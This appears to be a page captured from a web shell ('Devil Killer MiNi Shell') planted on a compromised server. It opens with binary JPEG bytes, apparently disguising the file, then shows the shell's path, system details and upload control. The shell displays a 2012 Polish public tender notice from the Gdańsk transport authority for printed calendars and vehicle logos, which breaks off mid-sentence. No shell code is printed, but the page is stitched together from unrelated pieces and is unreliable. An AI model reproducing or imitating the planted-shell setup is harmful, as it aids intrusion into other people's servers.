JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121029/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121029/229169-N-2012.html

<p class="kh_header"><b>Gdańsk: Dostawa kalendarzy ściennych MZKZG (wraz z kopertami) na rok 2013, kalendarzy książkowych na rok 2013, wyklejek taryfowych, logotypów na pojazdy oraz folderów reklamowych z kopertami do Metropolitalnego Związku Komunikacyjnego Zatoki Gdańskiej</b><br>
<b>Numer ogłoszenia: 229169 - 2012; data zamieszczenia: 29.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Metropolitalny Związek Komunikacyjny Zatoki Gdańskiej , ul. Sobótki 9, 80-247 Gdańsk, woj. pomorskie, tel. 0-58 342-25-00, faks 0-58 342-24-99.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.mzkzg.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: związek międzygminny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa kalendarzy ściennych MZKZG (wraz z kopertami) na rok 2013, kalendarzy książkowych na rok 2013, wyklejek taryfowych, logotypów na pojazdy oraz folderów reklamowych z kopertami do Metropolitalnego Związku Komunikacyjnego Zatoki Gdańskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego postępowania o udzielenie zamówienia publicznego jest dostawa : kalendarzy ściennych MZKZG (wraz z kopertami) na rok 2013, kalendarzy książkowych na rok 2013, wyklejek taryfowych, logotypów na pojazdy oraz folderów reklamowych z kopertami do Metropolitalnego Związku Komunikacyjnego Zatoki Gdańskiej: GRUPA 1 - KALENDARZE ŚCIENNE MZKZG ( WRAZ Z KOPERTAMI) NA 2013 ROK: 7 kart - gramatura papieru 7 kart: 275-300 g/m2 + 1 karta stanowiąca wzmocnienie - wykonana z grubego, sztywnego kartonu (biała) w uzgodnieniu z Zamawiającym; format netto pojedynczej karty: szerokość 440 mm; wysokość 480 mm; karty połączone spiralą metalową matową (nie malowaną) po krótszym boku , 1 zawieszenie; kolory: karta tytułowa: CMYK 4/1 oraz 6 kart: CMYK 4/4, karta stanowiąca wzmocnienie bez nadruku; materiał: Polaris Matt (bezdrzewny; dwustronnie, trzykrotnie powlekany, z powłoką niebarwioną 3+3; biały; matowojedwabisty; nietłoczony; bez znaku wodnego; nieprzezroczysty) lub równoważny pod względem techniczno-użytkowym; uszlachetnianie 7 kart - lakier offsetowy lub folia matowa; spady: 3 mm, ilość 300 (słownie: trzysta) sztuk, Koperta do kalendarza ściennego (wskazanego powyżej): format netto: szerokość 460 mm; wysokość 500 mm dopasowane do kalendarza; gramatura papieru 150-170 g/m2; materiał: koperty ekologiczne wykonane w 100% z papieru pochodzącego z recyklingu, papier niepowlekany offsetowy matowy, kolor biały, gramatura 150-170 g/m2, koperta sklejona z klapką, samoklejąca z klejem; nadruk - CMYK 4/0 przygotowany przez Zamawiającego, ilość 200 (słownie: dwieście) sztuk, opis kalendarzy wskazanych w GRUPIE 1: Projekty graficzne kalendarza oraz kalendariów zostaną dostarczone przez Zamawiającego w formie plików .pdf (wygenerowanych z programu InDesign CS5.5 lub CS6; Materiały Zamawiającego zostaną dostarczone przez Zamawiającego - Wykonawcy w terminie do dnia 1 grudnia 2012 roku w formie elektronicznej, przy wykorzystaniu poczty elektronicznej lub FTP; Przed wykonaniem wydruku Wykonawca poda Zamawiającemu pełną specyfikację papieru użytego do wydruku; Wykonawca wykona i doręczy Zamawiającemu wydruk próbny wszystkich kart w skali 1:1: Proof (skalibrowany druk zgodny kolorystycznie z drukiem na maszynie offsetowej). Zamawiający zastrzega sobie możliwość wniesienie poprawek (oraz zastrzega sobie prawo do żądania wykonania jeszcze jednego wydruku próbnego - w przypadku wniesienia poprawek) w terminie 3 (słownie: trzech) dni roboczych od daty otrzymania wydruku próbnego. Zatwierdzony Proof będzie podstawą do oceny zgodności druku z projektem. Sposób pakowania kalendarzy: 200 (słownie: dwieście) sztuk kalendarzy włożonych do otwartych kopert i zapakowanych po 25 (słownie: dwadzieścia pięć) sztuk. Pozostałe 100 (słownie: sto) sztuk kalendarzy zapakowanych po 25 (słownie: dwadzieścia pięć) sztuk. GRUPA 2 - KALENDARZE KSIĄŻKOWE A5 NA ROK 2013, format: A5; oprawa: szyta i klejona; MARTENA C2214 lub równoważna pod względem techniczno-użytkowym; kolor oprawy: niebieska; dwie tasiemki: granatowa i bordowa; papier: kalendarium - offsetowy 70 g/m2, biały; wyklejka - 120 g/m2, biały; układ kalendarium dzień na stronie, nazwy miesięcy i dni w języku polskim, angielskim i niemieckim, podwójne imiona, dni świąteczne; bez registrów; narożniki perforowane; data na okładce tłoczona (w cenie) logo MZKZG na okładce tłoczone (w cenie wraz z wykonaniem matrycy) położenie daty na okładce w uzgodnieniu z Zamawiającym; wymiary tłoczonego logo: szer. 25mm, wys. 35mm, sposób tłoczenia logo i daty: tłoczenie suche; mapa Polski na wklejce; notes teleadresowy w bloku; kalendarium 2012, 2013 i 2014, plan roku 2013; 12 kalendarzyków skróconych na każdej rozkładówce ilość: 50 (słownie: pięćdziesiąt) sztuk, opis kalendarzy wskazanych w grupie 2: projekt graficzny loga - w postaci pliku .pdf wygenerowanego z programu InDesign CS2 - zostanie dostarczony przez Zamawiającego - Wykonawcy w terminie do dnia 29 listopada 2012 roku w formie elektronicznej przy wykorzystaniu poczty elektronicznej lub FTP. GRUPA 3 - WYKLEJKI TARYFOWE: format netto: A4, wysokość - 297 mm; szerokość - 210 mm; pełen kolor 4/0; folia samoprzylepna biała błyszcząca; zabezpieczenie: folia połysk, ilość 350 (słownie: trzysta pięćdziesiąt) sztuk opis wyklejek taryfowych wskazanych w grupie 3: Projekt graficzny zostanie dostarczony przez Zamawiającego w formie plików .pdf (wygenerowanych z Adobe InDesign CS5.5 lub CS6); Materiały Zamawiającego zostaną dostarczone przez Zamawiającego - Wykonawcy w terminie: najpóźniej do dnia 1 grudnia 2012 roku w formie elektronicznej, przy wykorzystaniu poczty elektronicznej lub FTP; WYKONAWCA wykona i doręczy ZAMAWIAJĄCEMU wydruk próbny w skali 1:1: Proof (skalibrowany druk zgodny kolorystycznie z drukiem na maszynie offsetowej). Zamawiający zastrzega sobie możliwość ewentualnego wniesienie poprawek (oraz zastrzega sobie prawo do żądania wykonania jeszcze jednego wydruku próbnego - w przypadku wniesienia poprawek) w terminie 3 (słownie: trzech) dni roboczych od daty otrzymania wydruku próbnego . Zatwierdzony Proof będzie podstawą do oceny zgodności druku z projektem. Sposób pakowania wyklejek taryfowych: po 50 (słownie: pięćdziesiąt) sztuk w paczce. GRUPA 4 - LOGOTYPY NA POJAZDY: poz. 1 Logotyp nr 1: zadruk: 1/0 - biała farba; format netto: szerokość - 800 mm; wysokość - 150 mm; bezbarwna folia samoprzylepna zabezpieczona laminatem (folią błysk 1/0), ilość: 800 (słownie: osiemset) sztuk, poz. 2 logotyp nr 2: zadruk: 5/0 - pantony; dodatkowo pod zadrukiem należy umieścić podkład bazowy koloru białego; format netto: szerokość - 800 mm; wysokość - 150 mm; bezbarwna folia samoprzylepna zabezpieczona laminatem (folia błysk 1/0), ilość: 80 (słownie: osiemdziesiąt) sztuk , poz. 3 logotyp nr 3: zadruk: 4/0 - 3 kolory panton + biała farba (jeden z napisów jest wykonany białą farbą); dodatkowo pod zadrukiem należy umieścić podkład bazowy koloru białego; format netto: szerokość - 650 mm; wysokość - 150 mm; bezbarwna folia samoprzylepna zabezpieczona laminatem (folia błysk 1/0), ilość: 80 (słownie: osiemdziesiąt) sztuk , opis logotypów na pojazdy wskazanych w grupie 4: Projekt graficzny zostanie dostarczony przez Zamawiającego w formie plików .pdf (wygenerowanych z Adobe InDesign CS5.5 lub CS6); Materiały Zamawiającego zostaną dostarczone przez Zamawiającego - Wykonawcy w terminie: najpóźniej do dnia 1 grudnia 2012 roku w formie elektronicznej, przy wykorzystaniu poczty elektronicznej lub FTP; WYKONAWCA wykona i doręczy ZAMAWIAJĄCEMU wydruk próbny w skali 1:1: Proof (skalibrowany druk zgodny kolorystycznie z drukiem na maszynie offsetowej). Zamawiający zastrzega sobie możliwość ewentualnego wniesienie poprawek (oraz zastrzega sobie prawo do żądania wykonania jeszcze jednego wydruku próbnego - w przypadku wniesienia poprawek) w terminie 3 (słownie: trzech) dni roboczych od daty otrzymania wydruku próbnego . Zatwierdzony Proof będzie podstawą do oceny zgodności druku z projektem.  Sposób pakowania logotypów wskazanych poz. 1: po 50 (słownie: pięćdziesiąt) sztuk w paczce. GRUPA 5 - FOLDERY REKLAMOWE Z KOPERTAMI: Foldery reklamowe: liczba stron: 12 (słownie: dwanaście); format jednej strony: szerokość 240 mm x wysokość 200 mm; zadruk: kolory CMYK 4/4; papier - okładka: Polaris Matt (bezdrzewny; dwustronnie, trzykrotnie powlekany, z powłoką niebarwioną 3+3; biały; matowojedwabisty; nietłoczony; bez znaku wodnego; nieprzezroczysty) o gramaturze 350-370 g/m2 lub papier równoważny pod względem techniczno-użytkowym. Dodatkowo uszlachetnianie - folia matowa 1/1; papier - strony wewnętrzne: Polaris Matt (bezdrzewny; dwustronnie, trzykrotnie powlekany, z powłoką niebarwioną 3+3; biały; matowojedwabisty; nietłoczony; bez znaku wodnego; nieprzezroczysty) o gramaturze 150-175 g/m2 lub papier równoważny pod względem techniczno-użytkowym; zszycie kartek: metalowe zszywki, ilość: 700 (słownie: siedemset) sztuk, Koperty do folderów reklamowych wskazanych powyżej: format netto: szerokość 260 mm; wysokość 220 mm dopasowane do folderu; gramatura papieru 150-170 g/m2; papier kreda 170 g typu Claro (biała, dwustronnie powlekana, bezdrzewna) lub równoważna pod względem techniczno-użytkowym; nadruk - CMYK 4/0 przygotowany przez Zamawiającego; sztancowanie, klejenie; pasek z klejem zabezpieczony paskiem papierowym, ilość: 500 (słownie: pięćset) sztuk opis folderów wskazanych w grupie 5: Projekt graficzny zostanie dostarczony przez Zamawiającego w formie plików .pdf (wygenerowanych z Adobe InDesign CS5.5 lub CS6); Materiały Zamawiającego zostaną dostarczone przez Zamawiającego - Wykonawcy w terminie: najpóźniej do dnia 1 grudnia 2012 roku w formie elektronicznej, przy wykorzystaniu poczty elektronicznej lub FTP; WYKONAWCA wykona i doręczy ZAMAWIAJĄCEMU wydruk próbny wszystkich kart w skali 1:1: Proof (skalibrowany druk zgodny kolorystycznie z drukiem na maszynie offsetowej). Zamawiający zastrzega sobie możliwość ewentualnego wniesienie poprawek (oraz zastrzega sobie prawo do żądania wykonania jeszcze jednego wydruku próbnego - w przypadku wniesienia poprawek) w terminie 3 (słownie: trzech) dni roboczych od daty otrzymania wydruku próbnego. Zatwierdzony Proof będzie podstawą do oceny zgodności druku z projektem. 2. Zamawiający wymaga realizacji przedmiotu niniejszego postępowania o udzielenie zamówienia publicznego zgodnie z warunkami zawartymi we wzorze umowy stanowiącym integralną część SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.92-8, 22.90.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium oraz wniesienia zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a/ Formularz oferty - załącznik numer 1 do SIWZ, c/ Formularz cenowy - załącznik numer 5 do SIWZ, c/ oświadczenie o  powierzeniu podwykonawstwa w ramach niniejszego zamówienia - załącznik numer 3 do SIWZ,d/
jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż w terminie wskazanym w III.4.3</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.mzkzg.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Metropolitalny Związek Komunikacyjny Zatoki Gdańskiej, ul. Sobótki 9, 80-247 Gdańsk, Sekretariat - dokument bezpłatny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.11.2012 godzina 10:00, miejsce: Metropolitalny Związek Komunikacyjny Zatoki Gdańskiej, ul. Sobótki 9, 80-247 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1/ przedmiot zamówienia nie jest finansowany ze środków Unii Europejskiej, 2/ Zamawiający nie dopuszcza formy elektronicznego porozumiewania się z Wykonawcami, 3/ numer postępowania: MZKZG/ZP/N/7/12.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> GRUPA 1 - KALENDARZE ŚCIENNE MZKZG ( WRAZ Z KOPERTAMI) NA 2013 ROK.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GRUPA 1 - KALENDARZE ŚCIENNE MZKZG ( WRAZ Z KOPERTAMI) NA 2013 ROK: 7 kart - gramatura papieru 7 kart: 275-300 g/m2 + 1 karta stanowiąca wzmocnienie - wykonana z grubego, sztywnego kartonu (biała) w uzgodnieniu z Zamawiającym; format netto pojedynczej karty: szerokość 440 mm; wysokość 480 mm; karty połączone spiralą metalową matową (nie malowaną) po krótszym boku , 1 zawieszenie; kolory: karta tytułowa: CMYK 4/1 oraz 6 kart: CMYK 4/4, karta stanowiąca wzmocnienie bez nadruku; materiał: Polaris Matt (bezdrzewny; dwustronnie, trzykrotnie powlekany, z powłoką niebarwioną 3+3; biały; matowojedwabisty; nietłoczony; bez znaku wodnego; nieprzezroczysty) lub równoważny pod względem techniczno-użytkowym; uszlachetnianie 7 kart - lakier offsetowy lub folia matowa; spady: 3 mm, ilość 300 (słownie: trzysta) sztuk, Koperta do kalendarza ściennego (wskazanego powyżej): format netto: szerokość 460 mm; wysokość 500 mm dopasowane do kalendarza; gramatura papieru 150-170 g/m2; materiał: koperty ekologiczne wykonane w 100% z papieru pochodzącego z recyklingu, papier niepowlekany offsetowy matowy, kolor biały, gramatura 150-170 g/m2, koperta sklejona z klapką, samoklejąca z klejem; nadruk - CMYK 4/0 przygotowany przez Zamawiającego, ilość 200 (słownie: dwieście) sztuk, opis kalendarzy wskazanych w grupie 1: Projekty graficzne kalendarza oraz kalendariów zostaną dostarczone przez Zamawiającego w formie plików .pdf (wygenerowanych z programu InDesign CS5.5 lub CS6; Materiały Zamawiającego zostaną dostarczone przez Zamawiającego - Wykonawcy w terminie do dnia 1 grudnia 2012 roku w formie elektronicznej, przy wykorzystaniu poczty elektronicznej lub FTP; Przed wykonaniem wydruku Wykonawca poda Zamawiającemu pełną specyfikację papieru użytego do wydruku; Wykonawca wykona i doręczy Zamawiającemu wydruk próbny wszystkich kart w skali 1:1: Proof (skalibrowany druk zgodny kolorystycznie z drukiem na maszynie offsetowej). Zamawiający zastrzega sobie możliwość wniesienie poprawek (oraz zastrzega sobie prawo do żądania wykonania jeszcze jednego wydruku próbnego - w przypadku wniesienia poprawek) w terminie 3 (słownie: trzech) dni roboczych od daty otrzymania wydruku próbnego. Zatwierdzony Proof będzie podstawą do oceny zgodności druku z projektem.  Sposób pakowania kalendarzy: 200 (słownie: dwieście) sztuk kalendarzy włożonych do otwartych kopert i zapakowanych po 25 (słownie: dwadzieścia pięć) sztuk. Pozostałe 100 (słownie: sto) sztuk kalendarzy zapakowanych po 25 (słownie: dwadzieścia pięć) sztuk. Zamawiający wymaga realizacji przedmiotu niniejszego postępowania o udzielenie zamówienia publicznego zgodnie z warunkami zawartymi we wzorze umowy stanowiącym integralną część SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.92-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> GRUPA 2 - KALENDARZE KSIĄŻKOWE A5 NA ROK 2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GRUPA 2 - KALENDARZE KSIĄŻKOWE A5 NA ROK 2013, format: A5; oprawa: szyta i klejona; MARTENA C2214 lub równoważna pod względem techniczno-użytkowym; kolor oprawy: niebieska; dwie tasiemki: granatowa i bordowa; papier: kalendarium - offsetowy 70 g/m2, biały; wyklejka - 120 g/m2, biały; układ kalendarium dzień na stronie, nazwy miesięcy i dni w języku polskim, angielskim i niemieckim, podwójne imiona, dni świąteczne; bez registrów; narożniki perforowane; data na okładce tłoczona (w cenie) logo MZKZG na okładce tłoczone (w cenie wraz z wykonaniem matrycy) położenie daty na okładce w uzgodnieniu z Zamawiającym; wymiary tłoczonego logo: szer. 25mm, wys. 35mm, sposób tłoczenia logo i daty: tłoczenie suche; mapa Polski na wklejce; notes teleadresowy w bloku; kalendarium 2012, 2013 i 2014, plan roku 2013; 12 kalendarzyków skróconych na każdej rozkładówce ilość: 50 (słownie: pięćdziesiąt) sztuk, opis kalendarzy wskazanych w grupie 2: projekt graficzny loga - w postaci pliku .pdf wygenerowanego z programu InDesign CS2 - zostanie dostarczony przez Zamawiającego - Wykonawcy w terminie do dnia 29 listopada 2012 